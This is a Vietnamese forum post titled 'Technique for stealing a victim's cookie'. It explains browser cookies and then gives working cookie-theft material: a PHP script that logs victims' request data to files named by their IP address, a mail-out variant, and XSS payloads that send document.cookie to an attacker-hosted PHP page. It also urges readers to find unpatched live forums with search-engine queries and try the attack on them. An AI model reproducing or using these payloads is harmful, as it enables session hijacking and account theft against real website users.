minhlap.allgoo.us
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


When we control the event,we control your lives
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập
Tìm kiếm
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Tô màu theo vùng quét
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeTue Aug 13, 2013 4:18 pm by minhlap

» authentischen Hermes Lindy Taschen
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeWed Jan 23, 2013 11:15 am by cangliang

» Hermes Bag
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeWed Jan 23, 2013 11:14 am by cangliang

» Hermes Evelyn pm
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeWed Jan 23, 2013 11:13 am by cangliang

» Hermes Kelly bag billig
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeMon Jan 21, 2013 8:57 am by cangliang

» Hermes Constance Bag
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeMon Jan 21, 2013 8:56 am by cangliang

» Discout Hermes Belt
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeMon Jan 21, 2013 8:55 am by cangliang

» Christian Louboutin Love Flats
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeTue Jan 15, 2013 12:25 pm by cangliang

» Christian Louboutin Love Flats
Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeTue Jan 15, 2013 12:25 pm by cangliang

Navigation
 Portal
 Diễn Đàn
 Thành viên
 Lý lịch
 Trợ giúp
 Tìm kiếm
March 2024
MonTueWedThuFriSatSun
    123
45678910
11121314151617
18192021222324
25262728293031
CalendarCalendar
Diễn Đàn
Affiliates
free forum


 

 Kỹ thuật lấy cắp cookie của nạn nhân

Go down 
2 posters
Tác giảThông điệp
minhlap
Admin - Quản trị viên
Admin - Quản trị viên
minhlap


Tổng số bài gửi : 129
Points : 374
Reputation : 5
Join date : 22/07/2009
Age : 34
Đến từ : TP Hồ Chí Minh

Kỹ thuật lấy cắp cookie của nạn nhân Empty
Bài gửiTiêu đề: Kỹ thuật lấy cắp cookie của nạn nhân   Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeWed Aug 12, 2009 1:17 pm

Cookie là gì ?

_ Cookie là những phần dữ liệu nhỏ có cấu trúc được chia sẻ giữa web site và browser của người dùng. cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua trong site.
Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen...Cookie được browser của người dùng chấp nhận lưu trên đĩa cứng của máy mình, ko phải browser nào cũng hỗ trợ cookie. Sau một lần truy cập vào site, những thông tin về người dùng được lưu trữ trong cookie. Ở những lần truy cập sau đến site đó, web site có thể dùng lại những thông tin trong cookie (như thông tin liên quan đến việc đăng nhập vào 1 forum...) mà người ko phải làm lại thao tác đăng nhập hay phải nhập lại các thông tin khác. Vấn đề đặt ra là có nhiều site quản lý việc dùng lại các thông tin lưu trong cookie ko chính xác, kiểm tra ko đầy đủ hoặc mã hoá các thông tin trong cookie còn sơ hở giúp cho hacker khai thác để vượt qua cánh cửa đăng nhập, đoạt quyền điêu khiển site .

_ Cookies thường có các thành phần sau :

+ Tên: do người lập trình web site chọn
+ Domain: là tên miền từ server mà cookie được tạo và gửi đi
+ Đường dẫn: thông tin về đường dẫn ở web site mà bạn đang xem
+ Ngày hết hạn: là thời điểm mà cookie hết hiệu lực .
+ Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ đựơc mã hoá trong quá trình truyền giữa server và browser.
+ Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để nhận dạng về sau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy và bị giới hạn trong khoảng 4k.

( Tài liệu của Viethacker.net )

Kỹ thuật lấy cắp cookie của nạn nhân :

_ Trước hết , các bạn hãy mở notepad rồi chép đoạn mã sau vào notepad đó :

CODE
define (``LINE``, ``\r\n``);
define (``HTML_LINE``, ``
``);
function getvars($arr, $title)
{
$res = ````;
$len = count($arr);
if ($len > 0)
{
if (strlen($title) > 0)
{
print(``[--------$title--------]`` . HTML_LINE);
$res .= ``[--------$title--------]`` . LINE;
}
foreach ($arr as $key = > $value)
{
print(``[$key]`` . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= ``[$key]`` . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date(``Y-m-d H:i:s``);
// init
$myData = ``[-----$now-----]`` . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, ````);
// file
$file = $REMOTE_ADDR . ``.txt``;
$mode = ``r+``;
if (!file_exists($file))
$mode = ``w+``;
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
? >


hoặc

CODE
if ($contents && $header){
mail(``victim@yahoo.com`` , ``from mail script``,$contents,$header) or
die(`couldnt email it`);
sleep(2);
? >



} else {
echo ``nope``;
}


(Bạn hãy sửa cái victim@yahoo.com thành địa chỉ Mail của bạn ) .

Bạn hãy save cái notepad này với tên “< tên tuỳ các bạn > .php ” ( Nhớ là phải có .php ) rồi upload lên một host nào đó có hỗ trợ PHP , trong VD của tôi là abc.php .( Đối với các bạn đã từng làm Web chắc sẽ rất dễ phảI không ? ) . Đoạn mã này sẽ có nhiệm vụ ăn cắp thông tin (và có khi có cả cookie ) của nạn nhân khi họ mở dữ liệu có chứa đoạn mã này rồI tự động save thông tin đó thành file < ip của nạn nhân > .txt .
_ Còn một cách nữa để lấy cookie đựơc sử dụng trên các forum bị lỗi nhưng chưa fix , khi post bài bạn chi cần thêm đoạn mã sau vào bài của mình :

CODE
document.write(` `)


với host_php : là địa chỉ bạn đã upload file ăn cắp cookie đó lên .
và abc.php là file VD của tôi .
_ Ví dụ : khi áp dụng trong tag img, ta dùng như sau:

CODE
`)\">


hoặc:

[CODE
img]javascript: Document.write(`<img src=http://host_php/docs.php?docs=`+escape(document .cookie)+`>`)\">


_ Bạn có thể tìm những trang web để thực hành thử cách trong VD này bằng cách vào google.com tìm những forum bị lỗi này bằng từ khoá ``Powered by …….. forum” với những forum sau : ikonboard, Ultimate Bulletin Board , vBulletin Board, Snitz . Nếu các bạn may mắn các bạn có thể tìm thấy những forum chưa fix lỗi này mà thực hành , ai tìm được thì chia sẽ với mọi người nhé .
_ Còn nhiều đoạn mã ăn cắp cookie cũng hay lắm , các bạn hãy tự mình tìm thêm .
Về Đầu Trang Go down
https://minhlap.forumvi.com
tungit07
Thành viên bậc 1
Thành viên bậc 1



Tổng số bài gửi : 1
Points : 1
Reputation : 0
Join date : 13/10/2010

Kỹ thuật lấy cắp cookie của nạn nhân Empty
Bài gửiTiêu đề: Re: Kỹ thuật lấy cắp cookie của nạn nhân   Kỹ thuật lấy cắp cookie của nạn nhân Icon_minitimeWed Oct 13, 2010 11:29 pm

Về Đầu Trang Go down
 
Kỹ thuật lấy cắp cookie của nạn nhân
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Thủ thuật lập trình c#
» Kỹ thuật xâm nhập máy tính đang online
» Giải thuật di truyền
» Tài liệu giải thuật di truyền .pdf
» thuật toán trò chơi bida

Permissions in this forum:Bạn không có quyền trả lời bài viết
minhlap.allgoo.us :: Quản Trị Mạng :: Kinh nghiệm-
Chuyển đến